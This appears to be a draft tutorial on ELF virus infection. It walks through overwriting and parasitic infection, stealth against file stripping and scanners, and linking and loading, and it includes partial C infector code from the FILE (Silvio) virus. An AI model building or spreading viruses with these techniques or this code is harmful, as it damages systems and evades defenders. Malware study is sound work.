ELF INFECTION

Introduction
Overwriting Infection
The Text and Data Segments
Parasitic Infection
Non Binary Infection
Non Binary Infection Compatable With File Stripping
Linking And Loading
Binary Infection
A Different Look At Infection
Section Alignment Padding Infection
Function Alignment Padding Infection
Padding Infection
Text Infection
Data Infection
Program Header Insertion
Miscelaneous Infection
Library Infection
Object Files
Infecting Infections
Chaining
Surface Tracing
Encryption
Polymorphism

Introduction

Infection is the pivotal function of a virus or parasite irrespective of the operating system. A virus absolutely must live in a host program to be classified as such, and thus requires a method of infection. Infection is the process of modifying a host such that the virus or parasite is run when the host normally is. That is, the virus attaches itself to the host. The virus may possibly return control back to the host afterwards, or even run after the host has been executed. Having the host run along with the virus isnt necessarily always required though, and many early viruses destroyed the host completely leaving only the virus to run.

Given that infection is all about executing the virus when the host is normally run, obviously seems to point at infecting executeables, but this isnt set in stone. A virus may infect other objects including the following rather incomplete list.

To write a complete list would be pointless, since a new medium for infection is basically only a limit of imagination.

executeables
other processes
source code
scripts
makefiles
man pages
kernel modules
libraries
package formats

For example, a process virus can be made where the host is another running process. The virus can infect processes it has access too, and replicate through a variety of methods such as gaining control of process creation system calls. More alternative methods of viruses are using source code as the host. In this case, the virus can be additional source that is executed when the program has been compiled and run, which possibly looks for more source code or executeables to infect. TLB (Stealth 1999) is an example of such a virus like this.

Languages such as that used by Makefiles can be infected, which scan for more Makefiles to infect. Man pages are also another viable target since it uses the troff text processing language. A man page virus has been written by Stealth in 1999. Shared and static object files can infect certain functions or initialization routines. In an issue of Phrack, issue 56, one of the contributers, Klog, presented a binary backdoor technique that modified library objects such that hostile code was inserted into the binary to intercept library functions. Linux kernel modules which are implemented as static object files can use these techniques as well to infect other modules on the system, and remember, the virus would be running with superuser priveledges. The fuzz virus (Anonymous 1997) does this and uses linux kernel modules to propogate. Even package formats for a particular operating system or systems can house a virus. Typically these are used only by the superuser again, so a package format virus would be capable of great damage to the system.

An effective virus in Unix probably implements more than one type of infection, so that it has the greatest capacity for replicating. Executeable infection however as exepected is the most common form of infection since most virus technology has evolved from operating systems where this form of infection was most seen. In these earlier systems, executeables are typically not protected by security devices such as seperation of priveledge between users like Unix thus infecting executeables was very effective. Executeable and related binary infection will be the centre of discussion we will be following.

In this chapter we will be looking at various methods of infecting a binary executeable. We will start off with a simple overwriting virus that infects a host by overwriting it with the virus. A non binary parasitic virus will be looked at which leaves the original host intact and returns control to it, but does not modify the object format internally. An extension of this is a virus that uses the same infection technique but modifies the internal object format to disguise the virus. We will then moving onto the more complex but flexible infection techniques that incorporate the virus as part of the host's process image. These advanced techniques include methods to replace the host image with virus and restoring later, appending or prepending the virus code to the image or overwriting the padding in or between segments of the image.

Also discussed will be ways of making the infection harder for virus scanners to detect. This will revolve around "chaining" and "surface tracing" which modifies the host so that the original "entry point" of the program does not change even though the virus is the first thing in the execution flow. Also in line with evading detection is encryption and "polymorphism", a technique which modifies the binary code of the virus as it replicates. This makes it so that the virus cannot be scanned for, using a simple static binary signature.

Overwriting Infection

File infection is all about attaching to a binary such that the virus code gets executed when the host is executed. In some viruses, such as the Bliss virus (Anonymous 1996), infection meant overwriting an executable with the virus destroying the original data. The algorithm dictates that for every file the virus infects, it simply copies itself over the host being infected.

Pseudo Code For Overwriting File Infector

	infect(filename)
	{
		if (is_executeable(filename)) {
			copy(argv[0], filename);
		}
	}

This would destroy the original host program and isn't exactly desireable for an effective virus. Most people today regard an effective virus as being a virus that will infect as much of the system as possible before being detected. Alternatively, effective could mean gaining certain priveledges on the system, for example, gaining access to private documents or even the ultime of priveldeges - obtaining superuser status. In this case, the virus should remain out of sight until it completes its desired function.

Even though, by nature, this style of infection destroys executeables, provisions were made with the Bliss virus so that the original host files could be recovered. This could be done using a special option and argument list when running the virus.

The infection method just described of overwrtiting the host is not very effective, and is easily detectable as the next time the infected host executes, it will fail; remeber only the virus exists because it replaces the original host. THis can corrupt an entire system if vital binaries, dependant for a functioal system, are infected.

Some viruses such as the Bliss virus (Anonymous 1996) are overwriting yet use various methods of hiding infection. In this particular case, the virus only partially overwrote files that were greater than the size of the virus, overwriting the bytes in the file necessary to house the virus.

The Bliss Virus

        ORIGINAL HOST           INFECTED HOST
	[HHHHHHHHHHHHHH]	[VVVVVVVVVVVVVV]
	[HHHHHHHHHHHHHH]	[VVVVVVHHHHHHHH]
	[HHHHHHHHHHHHHH]	[HHHHHHHHHHHHHH]

Key:
	H	Host Information
	V	Virus

This method of stealth wasnt entirely fool proof or work as desired under certain situations. In the Bliss virus (Anonymous 1996), if the infected binary was "stripped" the remaining portion of the file not being part of the virus would be deleted. For example, if the virus was 10 kilobytes in size and the origianl host was 50K, the resulting infected binary would also be 50K consisting of the first 10k being the virus and the remaining 40k being the last 40k of the original host. If stripped however, the binary would become 10K again consisting only of the virus.

To strip a file is to remove supplementary information to the binary not required for normal functioning. This is such things as symbolic information used by the debugger, which is non essential. As a side note, stripping a binary at the present time of writing doesnt remove ALL unnecessary information in a binary but only symbolic and debugging information. For example, in the ELF format, various sections in the binary used for note style information on the binary which gives information on the compiler used and so forth still remains. Likewise, part of the binaries internal headers which are optional according to the file format still remain. This is because, the object file format library, BFD, requires these headers to exist if it is to recognize the binary. This requirement is likely to change at some point in the future, as the BFD library should work on all valid binaries, not just specific forms.

The reason why strpping a Bliss infected binary failed to work as expected, was that the ELF header for the virus is the first thing in the file. This is used as a road map for the rest of the executeable. Because only the ELF header and supplemenatary headers are used to determine what is essential to the binary, it only gave an indication of the virus and nothing about the remaining part of the host. Strip removed various parts of the ELF binary and since the host wasnt accounted for in the virus binary's internal format, which is all derived from the header, it was considered non essential.

The lesson learnt from this, is even a simple overwriting virus must be thought out carefully to work as desired. To correct the behaviour of the Bliss virus and other overwriting viruses that use this method of evading detection is possible. To do so requires that the binaries internal headers be modified to account for the extra information in the file. The headers responsible for this are the ELF Section Headers. As seen in the Siilov virus (Cesare 1999), creating a new section from scratch is not impossible, however it increases the complexity of the virus significantly, and requires some knoledge of the internal file format. This seems to contradict the entire philosophy of using this particular form of infection. This is because, the infection technique is so simple, and that is what makes it desireable.

Attempts have been made however to make such infection techniques compatable with file stripping and to retain an orthodox file format. These techniques will be described later.

Parasitic Infection

A more elegant solution to overwriting the host with the virus is too somehow insert the virus code into the host yet leaving the origianl host intact. Then modify the program flow so that the virus code is executed along with the host. This is the basis of any good virus. In this case, it is considered good, because a virus that runs the original host along with the virus code is harder to detect than an infected binary that obviously doesnt execute the original program.

That leaves us with three obvious options if we want the virus to remain part of the host image while the host is running. Note that we can use alternative techniques in which the virus occupies the same process space as the host, but only while the virus is running. After the virus completes execution, it can restore the host to its original content. However, ignoring that scenario we can run the virus before the host, run it after the host or run it in somewhere in the middle of the host. Inserting the virus into the middle of the host doesnt seem very good, because its too unpredictable and uncertain. For a start, we are probably going to have to overwrite some of the host code. Thus we destroy part of the original functionality of the host. If we find this acceptable, another question is how do we know where to insert it? And are we sure that our virus will be run in the position that we insert it, considering that some parts of the program are conditionally executed. For instance, part of a text editor used for cut and pasting which is only ever used if the user requests it. Appending the virus to the host is also difficult, because a virus may have multiple exit points or not exit at all. This isnt really too much of a problem in Unix however since if the program has been compiled with libc (the implementation of the standard C library) then the exit point is clearly marked. For reasons relating to residency however, viruses are most effective when inserted before the host. Memory resindent viruses allow us to intercept file access routines that are used by the program and other processes. Therefor it can infect files on a per access basis. To do this however, it makes sense to intercept such routines as early as possible. Inserting the virus before the host is clearly the most elegant solution.

To change the program flow of the host we can change the binary so that the code executed first is the virus. The address of the initial instruction executed is known as the entry point.

ORIGINAL PROGRAM

			+------------------------+
			|			 |
Entry point    ------->	|	TEXT SEGMENT	 |
			|			 |
			+------------------------+
			|			 |


INFECTED PROGRAM

                        +------------------------+
                        |                        |
Entry point    ---+     |       TEXT SEGMENT     | <--+		Entry point
                  |     |                        |    |
                  |     +------------------------+    |
                  |     |                        |    |
		  |  				      |
                  |     +------------------------+    |
                  |     |                        |    |
Entry point       +---> |          VIRUS         |    |
                        |                        |    |
                        +------------------------+ ---+		Exit point

In some older, or alternative operating systems and object formats, the entry point couldnt be specified explicity. In these systems the entry point was implicity defined such as the first byte in the file or at a specific location within the file. An example of using an implicit entry point was the MS-DOS .COM executeable format. This file format considered the file image a complete unmodified memory image of the process. The entry point for this object format was simply the first byte in the executeable. In modern times, most object formats allow the entry point to be defined explicity. Examples of this include the ELF format, and the modern a.out format.

As stated, the MS-DOS .COM format doesnt use an explicity defined entry point, but diverting program flow was still possible in this operating system. To do this you would modify the actual host code so that it would transfer control to the virus which was present in the host image. Typically, this would be by appending the virus to the host image.

replace the start (entry) of the program with a jump instruction the end of the program
append the virus to the end of the program to align the start with the destination of the jump in the previous part of the algorithm
execute the main code of the virus
have the virus replace the jump instruction with its original instruction or perhaps simultate it
jump back to the start of the program if the instruction was replaced or if the instruction was simulated, then jump back to the second instruction

ORIGINAL PROGRAM			INFECTED PROGRAM

STORE_LONG_0:	pushl %ebp			start:	jmp virus
STORE_LONG_1:	movl %esp,%ebp		
		.					.
		.					.
		.					.
		ret					ret
					virus:	.
						.
						.
						movl $STORE_LONG_0, start
						movl $STORE_LONG_1, 4(start)
						jmp start
					

	* STORE_LONG_0/1 are the first two long words in the
	original program that are overwriten by the initial
	jump instruction.  Exactly how many words should be
	saved and restored is implementation dependant.

This technique (known as chaining) cannot be used in a modern operating system like Unix using the algorithm just described for the following reasons

More complex object format
Permission problems with memory segments

Most modern Unix systems use a more complex object format. Becase of this, appending the virus to the host does not necessarily mean that the virus is now part of the process image. Alternatively, such viruses as the mandragore virus append the virus image to the host binary. The virus however makes special accounting and also is somewhat unreliable in its infection techniques. This virus is also plainly obvious to detection.

In the .COM executeable for MS-DOS, the code section is followed by the data section contigiously in memory. The file image is directly copied to the memory image in the process. Appending new data to the binary would simply result in the resulting process image using this new code or data.

In the executeables header information, the text and data segments are organized so that on loading, the operating system knows immediately how much memory these segments occupy. If we want to add new code to the image, we would need to add it to the text segment which is located at a specific position in the file. This segment is also probably before the data segment so we must physically insert the virus, not just overwrite or append.

Likewise header information must be modified in these executeables if we insert new code into the file image to account for new object code. The headers must also be modified to reflect changes in the files topology. Even if we were to use the data segment for the position of the virus code problems would still persist. The end of the file doesnt necessarily correlate to the end of the memory image. In the ELF and format, such things as symbol information appears after the object code.

Consider also, if we could insert our own code at the end of the data segment in Unix. If it were executed, it would likely cause havoc since in Unix unitialized data, known as the BSS section, immediately follows the data segment; the BSS isnt always present physically in the file as in the ELF object format; it only occupies space in the resulting process image. This means, that if the virus code immediately follows the data segment it would conflict with the code that uses the bss section. Again, the mandragore virus takes this into account, and modifies the BSS segment at runtime so it is clear for the host.

Beginning of file	+------+------------------+++++++
Lower memory		| TEXT | INITIALIZED DATA | BSS |	Higher Memory
			+------+------------------+++++++
					   
	* The BSS occupies no physical presence in the file

The second problem, is that the code section is typically marked read only.This makes it impossible for us to modify the code which our virus replaced in the host when using the simple chaining technique. However, a variation of this can be used in Unix with modifications the above algorithm taking into account memory permissions by changing the permission of the memory segment using non standard system calls. An example of this is that Siilov virus (Cesare 1999) which uses chaining.

Unix has not always been like this, and with early formats of the a.out object, the text and data segments were contigious to each other and all were marked writeable. This was very similar to the MS-DOS .COM format. The only real difference is that the Unix object file format uses a header to identify the file. MS-DOS uses file extentions for object identification and thus does not require a header. It is really out of context to discuss the two, but each has advantages and disadvantages. File space can be significantly saved by eliminating a lengthy header, but with more complex object formats, headers are almost inherintly required to give file topology. As always, with the advent of new technology transition began into the format we know today.

THE TEXT AND DATA SEGMENTS

In Unix operating system as with most modern systems, the process image is split into text and data memory segments; a segment here desribing a region of memory that can be considered to share common attributes. There are actually more segments than the text and data incldying such segments such as the stack. However text and data segments are the only segments which the file image actually represents. The actual main difference of the text and data segments and the reason why we consider them different segments is that of access permissions. Beyond just a natural conceptual reason for dividing text and data performance issues exist. An example being that many operating systems and architectures today can process pages with certain attributes faster that others.

A program can be split into two distinct parts, those being text and data. The test segment, which is so named for historical reasons, contains readonly data. This typically includes program code and any data which must remain constant for the life of the executeable. The readonly data described earlier includes such things as ascii strings and so forth. An example of a string in the text segment is in the following example.

printf("Hello\n");

Also sometimes present in the text segment is residual header information from the secondary storage media. An example of this is the ELF object format which fills the first part of the text segment with header information necessary for the loading of the binary. It does this because including the header information into the text segment does not require an entire new page be set aside in the file image. This occurs if demand paging is being used on the system. Not all object formats include header information as part of the text segment. In some object formats such as the zmagic a.out format, the header information takes up an entire page and the text segment starts on the following page. This format was also designed for demand paging, but opted that the text segment would not waste excessive memory by having the header information as part of the text segment. The downside of this, is that secondary storage must use more space than absolutely necessary by inclduing padding in the page for the header.

The data segment is for initialized data, unintialized data and for memory the program allocates using the heap. Each of these sections use different parts of the data segment and are treated differently, but the access permission on the data segment is the same for each of these. Note that in some operating systems such as Linux, initialized data, the BSS and the heap each have different permission attributes. In a C program, initalized data is global or static data that has been assigned a starting value.

	int init_data_1 = 1;
	int bss_2;

	int main()
	{
		int stack_1;
		static int init_data_2 = 2;

		.
		.
		.
	}

In this example, initialized data that reside in the initalized section of the data segment are the varaibles 'init_data_1' and 'init_data_2'. The variable 'stack_1' isnt in this section because it uses the stack for memory allocation. More interesting is the variable 'bss_2' which is unitialized. The section for unitialized data is called the BSS. Uninitlized data isnt actually such, as it is required to be set to zero on process loading but is special because it does not require to be in the file image. As explained earlier, in Linux, the permission on the BSS is read, write, and executeable. This is in contrast to the heap which is only read write, not executeable.

The seperation of text and data also shows some interesting portability problems for programs that ignore it. Consider the following poorly written C code.

	"Hello"[0] = 'G';

In an operating system that doesnt employ a seperation of segments, the entire process image is typically defined to be readable, writeable and executeable. Hence the above code will modify the string. However, in an operating system that seperates text and data, the code will result in violation of the systems memory access policy. In Unix, this results in a segmentation violation or SIGSEGV signal being sent to the process which in general causes the program to dump its core.

Modern systems use seperate segments for a number of reasons. These reasons includes that the text segment can be shared across processes executing the same binary. For example, if two processes are executing the same binary, then only one copy of the text segment ever needs to be loaded. That is, both processes can share this common text segment. Also advantageous of having seperate text and data is that read only pages can be more efficient than read write pages on modern systems as on such systems modifying a page results in the page being marked dirty. More ancient operating systems that use self modifying code and hence become non portable to such systems as moderm Unix where code is read only, are considered as using bad practice. This is true because it makes code hard to read. Also for more hardware oriented reasons when, how its possible to cache a sequence of instructions in code when it can modify itself. Self modifying code would need to flush the cache defeating all benefits from this type of hardware.

PROCESS IMAGE IN PAGED MEMORY MODEL

--

	Lower Memory Address

		[TTTTTTTTTTTTTTT]
		[TTTTTTTTTTTTTTT]
		[TTTTTTTTPPPPPPP]

		[DDDDDDDDDDDDDDD]
		[DDDDDDDDDDDDDDD]
		[DDDDDDDDBBBBBBB]

		[BBBBBBBBPPPPPPP]
		[PPPPPPPPPPPPPPP]
		[PPPPPPPPPPPPPPP]
		.
		.
		.

		[PPPPPSSSSSSSSSS]
		[SSSSSSSSSSSSSSS]
		[SSSSSSSSSSSSSSS]

	Higher Memory Address

--
	Key:
		T	TEXT	(ro)
		D	DATA	(rw)
		B	BSS	(rw)
		S	STACK	(rw)
		P	PADDING

		Three lines [] represents one page of memory

	* In the diagram the stack grows down, hence the padding is at a
	lower memory location.

	* Special note must be paid to the ordering of the text and data
	segment because while the text segment is of a fixed size, the
        data segment may grow (this section is referred to as the heap).
        This means the data segment must come after the text segment so
        it has room for this growth.

--

Paged memory hasnt always existed and originally and and text and data were not seperated from each other.

PROCESS IMAGE BEFORE PAGING AND SEPERATION OF TEXT AND DATA

--

	Lower Memory Address

		[TTTTTTTTTTTTTTT]
		[TTTTTTTTTTTTTTT]
		[TTTTTTTTDDDDDDD]
		[DDDDDDDDDDDDDDD]
		[DDDDDDDDDDDDDBB]
		[BBBBBBB]

	Higher Memory Address

--

	Key:
		T	TEXT	(rw)
		D	DATA	(rw)

	* The stack has been removed from the diagram for simplicity

--

Notice that the text and data seperation is purely conceptually, since both segments share the same permission.

Non Binary Infection

By far the most simplest form of parasitic infection that executes the host was demonstrated in the FILE virus (also known as the Silvio virus), (Cesare 1999). THis is probably the most popular virus technique seen at the time of writing due to its simplicity. It has also been used by the VLP virus and esepecially the 8000 virus which was found in the wild. This technique can be used on a variety of object formats (although I have yet to see a non Linux ELF version as of time of writing). It does not require internal manipulation of the binary's object format, hence its simplicity. Likewise, another major feature of this virus is that it can be completely written in a high level langauge. This makes the technique viable to virus authors who dont have the technical knowledge of object formats and other unix internals.

Some viruses, do however manipulate the binary's internal format for other reasons. This was demonstated by the 8000 virus (Anonymous, 2000). The 8000 virus was discovered in the wild running on the Linux operating system and modified the binary so that it could not be used in a standard debugger. Likewise, it could not be used in any othe programs like objdump that relied on the GNU BFD library. The BFD library is the object file format library responsible for handling the ELF specifics. BFD was subverted by a specially constructed executeable that was functional, but not recognized by the BFD library. Funnily enough, the 8000 virus modified ELF internals purely by accident. The original form of the virus was actually determined to be, the VLP virus. This virus hardcoded the size of itself, which was 8000 bytes, of the compiled program. The 8000 virus, however compiled to be much larger than the original 8000 bytes. During replication the virus truncated itself. As such, its highly likely that the distributor of the 8000 virus probably wasnt aware that this hardcoded figure existed and ignored it. This truncation caused a number of unessential sections and ELF information to be deleted, yet the program still remained functional.

To summarize the infection technique in this section, we note that we can append data to an ELF executeable without destroying any information necessary for the execution of the original program. This is because the ELF header information has its own idea of what part of the file is necessary for operation. By appending data, the format had no knoledge of this new data. Now if we append a host binary to a virus binary, the virus is executed first and the host program remains retriveable. How is this so? If the virus knows its own length, it can seek to that position and extract the rest of the file into a new executeable. Thus seperating the host from the virus, and is ready to execute transferring control back to the host.

A typical algorithm for this type of virus looks something like the following:

Transferring Control To The Host

execute virus work code
lseek to the end of the virus
read the remaining portion of the file
write to a new file
execute the new file

Virus Infection

read the virus part of the file
write to a new file
read the host
append the host to the new file
rename the new file to the host
make the host look like the original (permission, owernship, utime)

This is very simple algorithm, but the results are however not desireable for an effective virus. The executeable isnt totally compliant with the object format specifications since it only accounts for part of the binary. That is, the executeable that appears first in the binary. The reasons for this are the same why the Bliss virus fails to remain the same size after being stripped.

Likewise, this technique cannot be used with more advanced forms of residency. In these techniques, stub code is modified to gain control of dynamic library calls. However, for this to work, the replaced functions must reside in the process image. Therefor, the virus image must reside in the same image as the host image. This doesnt occur using the simple infection method described. be part of the original host image.

Another problem is that a new file must be created for the extraction of the host. Also an extra process needs to be created if you cleanup the file afterwards. The side effect of doing this, is that the extracted host file stays on the system until the host finishes execution. The 8000 and VLP viruses are an example of this type of virus that doesnt cleanup these files. As a result, the virus creates the files /tmp/tmp and /tempN where N is a number, which starts at zero. The FILE virus is another virus using this infection technique, but this time it does cleanup; but it creates an extra process while running.

Binary infection disccused in the next section, can address all these issues.

Before leaving this section a real life example of this technique is presented which was originally seen in the FILE virus, aka the Silvio virus (Cesare 1999).

int infect(char *filename, int hd, char *virus)
{
        int fd;
        struct stat stat;
        char *data;
        int tmagic;
        Elf32_Ehdr ehdr;

/* read the ehdr */

        if (read(hd, &ehdr, sizeof(ehdr)) != sizeof(ehdr)) return 1;

/* ELF checks */

        if (
                ehdr.e_ident[0] != ELFMAG0 ||
                ehdr.e_ident[1] != ELFMAG1 ||
                ehdr.e_ident[2] != ELFMAG2 ||
                ehdr.e_ident[3] != ELFMAG3
        ) return 1;

        if (ehdr.e_type != ET_EXEC && ehdr.e_type != ET_DYN) return 1;
        if (ehdr.e_machine != EM_386 && ehdr.e_machine != EM_486) return 1;
        if (ehdr.e_version != EV_CURRENT) return 1;

        if (fstat(hd, &stat) < 0) return 1;
        if (
                lseek(
                        hd, stat.st_size - sizeof(magic), SEEK_SET
                ) != stat.st_size - sizeof(magic)
        )
                return 1;
        if (read(hd, &tmagic, sizeof(magic)) != sizeof(magic)) return 1;
        if (tmagic == MAGIC) return 1;
        if (lseek(hd, 0, SEEK_SET) != 0) die("lseek");
        fd = open(TMP_FILENAME, O_WRONLY | O_CREAT | O_TRUNC, stat.st_mode);
        if (fd < 0) die("open(TMP_FILENAME)");
        if (write(fd, virus, PARASITE_LENGTH) != PARASITE_LENGTH)
                return 1;
        data = (char *)malloc(stat.st_size);
        if (data == NULL) return 1;
        if (read(hd, data, stat.st_size) != stat.st_size) return 1;
        if (write(fd, data, stat.st_size) != stat.st_size) return 1;
        if (write(fd, &magic, sizeof(magic)) != sizeof(magic)) return 1;
        if (fchown(fd, stat.st_uid, stat.st_gid) < 0) return 1;
        if (rename(TMP_FILENAME, filename) < 0) return 1;
        close(fd);
        return 0;
}

.
.
.


int main(int argc, char *argv[])
{

.
.
.

        if (fstat(fd, &stat) < 0) die("fstat");
        len = stat.st_size - PARASITE_LENGTH;
        data1 = (char *)malloc(len);
        if (data1 == NULL) die("malloc");
        if (lseek(fd, PARASITE_LENGTH, SEEK_SET) != PARASITE_LENGTH)
                die("lseek(fd)");
        if (read(fd, data1, len) != len) die("read(fd)");
        close(fd);
        out = open(TMP_FILENAME2, O_RDWR | O_CREAT | O_TRUNC, stat.st_mode);
        if (out < 0) die("open(out)");
        if (write(out, data1, len) != len) die("write(out)");
        free(data1);
        close(out);

#ifdef USE_FORK
        pid = fork();
        if (pid < 0) die("fork");
        if (pid == 0) exit(execve(TMP_FILENAME2, argv, envp));
        if (waitpid(pid, NULL, 0) != pid) die("waitpid");
        unlink(TMP_FILENAME2);
        exit(0);
#else
        exit(execve(TMP_FILENAME2, argv, envp));
#endif

	return 0;
}

[ lots to do here ]

Non Binary Infection Compatable With File Stripping

Addressing the problem of file stripping in this form of virus strongly suggests a look at the internal file format of the executeable. The F range of viruses tackle this problem and the result is a binary that is compatable with file stripping. From this point on, knowledge of the ELF format is required.

Inititally, the first attempt to make a virus strip safe (and consistant from the point of view of an orthodox binary created by orthodox system tools) is to extend the last section of the section header table. An ELF binary is segmented into sections. Each section describes that part of the binary. These sections can describe such thins as the text segment (.text) or the data segment (.data) or on a more fine grained level, such things as the inititalization section (.init) or the procedure linkage table (.plt). The last section in a typical ELF executable is the section header string table which on stripped binaries and is recognized as .shstrtab or on non stripped binaries .strtab. The .shstrab section is the section header string table which is used to house the string names of each section associated with that particular binary. The .strtab section is a string table used for the symbol table. This contains such things as function names, different parts of the code and such things as used for debugging, which isnt excplicit sdebugging information. The problem with using these sections to house parasitic or host information is that stripping the executeable modifies both these sections and deletes information that would contain almost certainly the viruses host.

The section that is extended in the final version of the F2 virus is the .note section. This section appears second last in a typical executeable in a stripped binary. Note that in a non stripped binary, the .note section is generally fourth last. To avoid this problem, the virus carrier is stripped before initital infection of a host.

        NON STRIPPED BINARY
        .
        .
        .
        [ .note         ]
        [ .shstrtab     ]

        * section header table

        [ .symtab       ]
        [ .strtab       ]

        ** EOF


        STRIPPED BINARY
        ---------------

        .
        .
        .
        [ .note         ]
        [ .shtrtab      ]

        * section header table

        ** EOF

The note section isnt strictly required to be present in an executeable after stripping the binary. However, the regular stripping utilities do not delete this section which leaves perfect oppurtunity to use as a cover for the virus.

Extending the note section does presenet some discrepencies in the execyutables laypout though. Remember, that this section is second last, so by extending this past the end of the original binary, means that this section and the shstrtab section will somewhat overlap. Thus, this provides a simple heuristic check to determine if something is suspect in the binary. Stripping the final binary actually results in the file size increasing. This is due to strip not being able to cleanly handle binaries with overlapping sections. This isnt really suprising, since overlapping sections would typically indicate a corrupt binary.

Improving on this current version of infections is acheived by eliminiation of the overlapping .shstrtab and .note sections. This can be done by copying the final .shstrtab and inserting it at the end of the original in the virus binary. The old .shstrtab is simply left in its original position in the file, but is not used.

        FILE LAYOUT #1

        [PPPPPPPPP]
        [PPPPPPPPP]
        [SSSSSSSSS]     <-- Not Used
        [HHHHHHHHH]
        [HHHHHHHHH]
        [HHHHHHHHH]
        [SSSSSSSSS]

        Key:
                P       Parasite/Virus
                H       Host
                S       Parasite/Virus ".shstrab" Section

The problem with this virus is again overlapping parts of the sections described in the binary, however this technique was used in the F3 virus. This time the .note sections is overlapping with the section header table. This is due to the fact that the original section header table appears at the end of the file in a stripped binary such as the carrier virus that is created. The note section extends from its original position through that section, through the section header, and finally through until the end of the host being housed. Thus the section header table is overlapping with the note section. Again, as with the previous infection algorithm, stripping this binary results in a larger file.

The final algorithm presented solves all the overlapping section problems and is the natural successor of the previous algorithm. This time, the section header table is appended to the end of the virus binary. This avoids any problems of overlapping sections.

        FILE LAYOUT #2

        [PPPPPPPPP]
        [PPPPPPPPP]
        [SSSSSSSSS]
        [TTTTTTTTT]
        [HHHHHHHHH]
        [HHHHHHHHH]
        [HHHHHHHHH]
        [SSSSSSSSS]
        [TTTTTTTTT]

        Key:
                P       Parasite/Virus
                H       Host
                S       Parasite/Virus ".shstrab" Section
                T       Parasite/Virus Section Header Table

This technique was described in the F4 virus and results in a binary that appears quite normal. Stripping this binary results in no changes to the executeable. Remember, that this carrier virus is stripped also to avoid creating of the .symtab and .strtab sections.

However, the common problem with all these techniques is that the .note section becomes abnormally large. Typically, the .note section contains a small amount of data. Certainlly, anything more than a very low byte count is supicious.

Linking And Loading

If we intend to modify the host image so that the virus is part of it, we need to understand how an executeable image is created and executed. These are the responsibilities of linking and loading respectively. Creating an executeable actually involves other steps. These include such things as compilation of source if a higher level language is used. Linking is the last stage of executeable creation from a higher level source langauge.

If we look at a typical section of code from a program we can see the following types of instructions.

	 8048677:       a3 8c 9e 04 08  movl   %eax,0x8049e8c

This could be derived from higher level code that looks something possibly like this.

	printf("Hi\n");

Notice that the address of the string "Hi\n" is at a fixed location in the executeable. The position of this string is dependant on many factors. These include the size of the entire program, the load address of the executeable and so forth. The load address is the starting virtual address of the executeable when the kernel loads it into memory ready for execution.

Link editing is the process of converting a relocatebale object file into an executeable object. Technically, linking is the process of binding abstract names to more concrete names. Relocateable objects are binaries whose code is not address dependant, that is, it is they are position independant. A compiler produces code that is relocateable and the linker processes this image so that the kernel can load and execute it at runtime.

Actually, most of the time, the assembler creates the relocatable image, but for the purposes of simplicity, we will omit that stage and conceptualize compiling as the process of converting high level code to a reloctable object. An executeable image in modern operating systems use virtual memory and has a fixed load address. Thus link editing is processing the relocatable code into a fixed position. Then it may be loaded directly into a process image. Note that linking and loading may often be interwined and certain functions change from linking to loading and vice versa in other operating systems.

To produce relocatable code the object format for that image generally includes relocation entries. Relocation entrie give the linker information on addresses in the image that must be relocated to fixed positions when the address of the image is known. For example, examine the following code.

        void foo(int a)
        {
                static int A;

                A = a;
        }

In the final executeable, the preceeding code is compiled into something similar to the following.

        pushl %ebp
        movl %esp,%ebp

*       movl 4(%ebp),0x8049100

        movl %ebp,%esp
        popl %ebp

Note that the marked line makes a reference to an absolute address. In a relocatable object, the address of the static variable A is not known until link time. The relocatable object marks the address of the reference and creates what is called a relocation entry. This relocation entry instructs the linker that the variable A which is in the initialized data section, is a certain offset away from the instance in which it is referred too. Thus, when the address of the code is known, the variable's position is also known. In practice, relocation entries are based from offsets to the ELF section that houses the entry being relocated. Likewise, each section has its own position within the relocatable object. Thus allowing for relocatable objects to be relocated to a fixed address.

In an operating such as MS-DOS linking and loading can be combined into the kernel. It is also possible so that linking can be avoided all together. In the MS-DOS .COM format, the executeable image is considered relocateable as soon as the compiler produces the object. Therefore it does not require a link editing stage.

The .COM format uses absolute addresses that reside in a single segment. This is relocatable because it uses segmented memory. Memory is references by segment and offset. This provides the abilitiy that an absolute reference can simply an offset. This is because under this format, each new program gets its own segment and is therefore relocatable since the offsets that are used in absolute addressing is in the current segment. That is, the kernel only has to give the program a new segment. A disadvatange to this scheme used in MS-DOS is that in this operating system segments are fixed sizes and can be no larger than 64K. This makes the .COM object limited to this size unless the program does its own relocation.

In other executeable formats, linking and loading are seperate steps but both are carried out by the kernel and linking is not processed with a link editor. In these object formats, the executeable has relocation entries often known as fixups. The MS-DOS EXE format is an example of this.

In modern Unix however, linking is carried out in user space and loading is done by the kernel. Alternative to executables but relevant in the discussion of linking and loaded, look at how loadable kernel modules (lkm) operate in the Linux operating system. The first item to note that the lkm's are actually relocatable objects. The reason for this, is that user programs operate with virtual memory and can give each new program its own address space. Typically, all processes use roughly the same virtual addressing since the linker defaults the load address. LKM's on the other hand must share its process space with the rest of the kernel. Thus, it is near impossible to give an LKM a default load address since it is likely not useable and is being occupied with other parts of the kernel. Link editing of LKM's are done by the programs responsible for inserting the modules from userspace. The kernel is then responsible for the final loading of the lkm by copying the processed LKM which userland is responsible for the link editing.

Binary Infection

Binary infection refers to infection techniques where the virus or hostile code is inserted into the host image. This is contrast to the previous techniques which all consider the virus as a seperate executeable. Binary methods are important for the following reasons.

No extra files or processes
Virus is part of the host process image

The virus being part of the host image is important. It means that original host can reference our virus while its executing. Not all binary techniques make this possible though, such as Staog and the vir.s parasite, which only remained in the image until control was returned to the host. An example of why having the virus as part of the host image, is useful is when applied with memory resident viruses. In resident viruses, intercepted functions within the host must have the replacement functions present in the image. This is because the virus must interact with the internal processes of execution in the host image. The PLT is a prime target because this paves the way to memory resident viruses. In this, the PLT is used to intercept shared library calls. Thus the virus must become an integral part of the process of host execution.

Keeping a single image also reduces the likelyhood of detection. Two images being executed is noticeable. The FILE aka Silvio virus uses two processes and creates a temporary file, present for the duration of the host executing. Likewise, the VLP virus creates a tempory file, which is never removed. Both of these viruses provide a possible method of virus detection through suspicious processes and files. If one process image is used, its much harder to distiniguish the virus from the host. The reason for this is obvious; they both combine to a single unified program; the virus effectively becomes, or at least looks like, the host. Likewise, there is no need for extra processes and files for the same line of thought.

An initial problem for a virus is to determine what address space to use. Because the executeable's code uses absolute references (eg. movl 0x8049000, %eax), we cant move the segments in memory. Note that when we use the term segment here, we do not refer to segmented memory as in MS-DOS. In this case, a segment is simply a region of memory sharing common attributes.

Knowing this information, leaves us with two major options to be able to modify the host image such that the virus is part of it.

Using the same memory image space for the virus as the host
Using the surrounding address space of the host image

